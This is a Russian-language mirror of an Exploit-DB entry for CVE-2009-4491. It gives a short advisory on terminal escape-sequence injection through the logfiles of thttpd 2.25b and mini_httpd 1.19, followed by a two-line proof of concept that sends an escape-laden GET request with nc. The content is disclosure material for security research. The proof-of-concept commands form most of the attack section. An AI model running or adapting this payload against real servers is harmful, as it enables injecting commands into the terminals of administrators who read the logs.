- 34,644
 
- 0
 
- 18 Дек 2022
 
- EDB-ID
 - 33499
 
- Проверка EDB
 - 
	
		
			
- Пройдено
 
 
- Автор
 - EVILALIV3
 
- Тип уязвимости
 - REMOTE
 
- Платформа
 - MULTIPLE
 
- CVE
 - cve-2009-4491
 
- Дата публикации
 - 2010-01-11
 
		Код:
	
	source: https://www.securityfocus.com/bid/37714/info
Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
This issue affects thttpd 2.25b and mini_httpd 1.19; other versions may also be affected. 
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
	- Источник
 - www.exploit-db.com